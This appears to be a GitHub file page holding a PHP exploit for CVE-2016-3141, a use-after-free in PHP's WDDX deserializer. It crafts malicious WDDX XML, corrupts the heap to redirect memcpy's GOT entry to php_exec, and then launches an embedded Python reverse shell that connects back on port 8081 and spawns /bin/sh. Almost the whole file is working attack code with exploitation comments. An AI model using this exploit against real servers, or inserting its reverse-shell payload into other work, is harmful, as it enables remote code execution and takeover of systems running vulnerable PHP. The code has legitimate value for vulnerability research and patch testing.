-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathpeter_code_execute.php
95 lines (73 loc) · 2.68 KB
/
peter_code_execute.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
<?php
/*
CVE-2016-3141
Use-after-free vulnerability in wddx.c in the WDDX extension in PHP \
before 5.5.33 and 5.6.x before 5.6.19allows remote attackers to cause \
a denial of service (memory corruption and application crash) or possibly \
have unspecified other impact by triggering a wddx_deserialize call on XML \
data containing a crafted var element.
From Denial Of Service To Code Execution
author (this exploit) : hoangnguyen
twitter : @peternguyen14
*/
function unpack8($addr,$debug=false)
{
$new_addr = 0;
for($i = 0; $i < strlen($addr); $i++){
if($debug === true)
echo ord($addr[$i])." ".(ord($addr[$i]) << $i*8)."\n";
$new_addr |= ord($addr[$i]) << $i*8;
}
return $new_addr;
}
function pack8($addr)
{
return pack("LL", $addr & 0xffffffff, $addr >> 32);
}
function exploit()
{
global $g,$t; // avoid php atomatic free my corrupted chunk when exploit function exit
$xml = <<<EOF
<?xml version='1.0' ?>
<!DOCTYPE wddxPacket SYSTEM 'wddx_0100.dtd'>
<wddxPacket version='1.0'>
<array>
<binary>HERE</binary>
<var name='XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'></var>
<binary>REPLACE</binary>
<var name='SUCK'></var>
<boolean value='a'/>
<boolean value='true'/>
</array>
</wddxPacket>
EOF;
$back_shell = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);";
$back_shell.= "s.connect((\"127.0.0.1\",8081));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);";
$back_shell.= "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'";
$g = null;
$write_value = base64_encode(pack8(0x61de65).str_repeat("P",1));
$write_addr = pack8(0xe94b00 - 0x10); # overwrite heap->cache[0] = 0xe94b00;
$xml = str_replace("HERE",$write_value,$xml);
$xml = str_replace("REPLACE",base64_encode(str_repeat("Z",64)),$xml);
$wddx = wddx_deserialize($xml); // trigger use after free
$t = "".str_repeat("F",32); // try to _emalloc in zend_heap
foreach($wddx as $k => $v){
// $t = $v . "\x00";
$k = "";
$k.= $write_addr; // $k now point to free_chunk, then overwrite free_chunk->prev = my addr
// printf("Key: %s\nValue: %s\n",$k,$v);
$t = (string)$v; // then may heap->cache[0] = my_addr
// make emalloc() return own $write_addr
$g = (string)$v; // overwrite memcpy@got pointer, point into this code
// 0x61de65 <php_exec_ex+341>: mov rcx,rbx
// 0x61de68 <php_exec_ex+344>: xor edx,edx
// 0x61de6a <php_exec_ex+346>: mov edi,ebp
// 0x61de6c <php_exec_ex+348>: call 0x61d9a0 <php_exec>
// when concat_function is called, then it reach memcpy $back_shell to new buffer
// and now we have rsi point to $back_shell, and php_exec will do the rest for us :D
$c = $back_shell.$t; // trigger shell
break;
}
}
exploit()
?>